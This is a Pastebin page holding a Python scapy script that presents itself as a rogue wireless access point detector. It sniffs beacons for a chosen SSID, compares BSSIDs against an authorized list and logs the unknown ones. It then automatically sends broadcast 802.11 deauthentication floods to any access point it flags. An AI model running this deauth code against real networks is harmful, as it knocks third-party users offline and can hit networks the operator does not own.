Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- # Wirelss ROUGE Identification System
- #Developed by @hcjuan04 - twitter
- # Credits Airoscapy for channel hooper and and most of the packet analisys method
- # Also credits to @RaiderSec
- import sys, os, signal
- from multiprocessing import Process
- import codecs
- import commands
- import time
- import datetime
- from scapy.all import *
- interface='' # monitor interface
- aps = {} # dictionary to store unique APs
- ssidarg = '' # SSID to adudit
- ifile2 = open('autho.txt', 'r') # Authorized APs
- autho=ifile2.readlines() # Authorized APs
- unautho = {} # unauthorized AP
- p= None
- # process unique sniffed Beacons and ProbeResponses.
- def sniffAP(p):
- if ( (p.haslayer(Dot11Beacon) or p.haslayer(Dot11ProbeResp)) and not aps.has_key(p[Dot11].addr3)):
- ssid = p[Dot11Elt].info
- bssid = p[Dot11].addr3
- channel = int( ord(p[Dot11Elt:3].info))
- capability = p.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}\
- {Dot11ProbeResp:%Dot11ProbeResp.cap%}")
- # Check for encrypted networks
- if re.search("privacy", capability): enc = 'Y'
- else: enc = 'N'
- # Save discovered AP
- aps[p[Dot11].addr3] = enc
- # Compare authorized AP
- if ssid.strip() == ssidarg :
- x=0
- # Serch for unauthorized AP
- print "CH ENC BSSID SSID"
- print "%02d %s %s %s" % (int(channel), enc, bssid, ssid)
- while x < len(autho) :
- strautho=autho[x]
- if strautho[0:17] == bssid.strip() :
- print "BSSID: ", bssid, " Authorized"
- x = len(autho)
- elif x == len(autho)-1 :
- print "WARNING - Unauthorized BSSID: ", bssid
- # Saving unauthorized
- unautho[bssid]=channel
- # Wrinting in the Log fiel
- try:
- flog= open("LOG.txt", "a")
- try:
- a=str(datetime.datetime.today())
- #print a
- flog.write(a + " WARNING - Unauthorized BSSID: "+ bssid +'\n')
- finally:
- flog.close()
- time.sleep(1)
- except IOError:
- print "Error appending log file, verify if LOG.txt is present"
- pass
- x = x + 1
- # Channel hopper
- def channel_hopper():
- while True:
- try:
- channel = random.randrange(1,15)
- os.system("iw dev %s set channel %d" % (interface, channel))
- time.sleep(1)
- except OSError :
- break
- # Capture interrupt signal and cleanup before exiting
- def signal_handler(signal, frame):
- global p
- p.terminate()
- p.join()
- print "\n========== STATISTICS =========="
- print "Total APs found: %d" % len(aps)
- print "Encrypted APs : %d" % len([ap for ap in aps if aps[ap] =='Y'])
- print "Unencrypted APs: %d" % len([ap for ap in aps if aps[ap] =='N'])
- #print unautho
- print "\n======================================"
- # Deauthentication method for Unauthorized APs
- def deauth(bssid, client, count):
- pckt = Dot11(subtype=12, addr1=client, addr2=bssid, addr3=bssid) / Dot11Deauth(reason=7)
- cli_to_ap_pckt = None
- if client != 'FF:FF:FF:FF:FF:FF' :
- cli_to_ap_pckt = Dot11(subtype=12, addr1=bssid, addr2=client, addr3=bssid) / Dot11Deauth(reason=7)
- print 'Sending Deauth to ' + client + ' from ' + bssid
- if not count:
- print 'Press CTRL+C to quit'
- while count != 0:
- try:
- for i in range(64):
- # Send out deauth from the AP
- send(pckt)
- if client != 'FF:FF:FF:FF:FF:FF':
- send(cli_to_ap_pckt)
- count -= 1
- except KeyboardInterrupt:
- break
- def main() :
- # Reset global variables
- try :
- while True :
- global aps
- global unautho
- aps = {}
- unautho = {}
- # Start the channel hopper
- global p
- p = Process(target = channel_hopper)
- p.start()
- # Capture timer
- signal.signal(signal.SIGALRM, signal_handler)
- signal.alarm(17)
- # Start the sniffer
- global interface
- sniff(iface=interface,prn=sniffAP,timeout=15)
- #print "Sniff finished"
- time.sleep(3) #Wait for Alarm
- ######### TRIGER #########
- global unautho
- global interface
- if unautho != {} :
- for key in unautho :
- chan=unautho[key]
- conf.iface=interface
- os.system("iw dev %s set channel %d" % (interface, chan))
- print "set card command: iw dev %s set channel %d" % (interface, chan)
- deauth(key, 'FF:FF:FF:FF:FF:FF', 50)
- print "deauthorization attack sent"
- except KeyboardInterrupt:
- print "WRIS terminated"
- if __name__ == "__main__":
- if len(sys.argv) != 3:
- print "Usage %s monitor_interface SSID_to_audit" % sys.argv[0]
- sys.exit(1)
- interface = sys.argv[1]
- ssidarg = sys.argv[2]
- print ssidarg
- # Print the program header
- print ""
- print "======= Wirelss ROUGE Identification System - WRIS ======="
- #==================DEBUG
- #import pdb
- #pdb.set_trace()
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement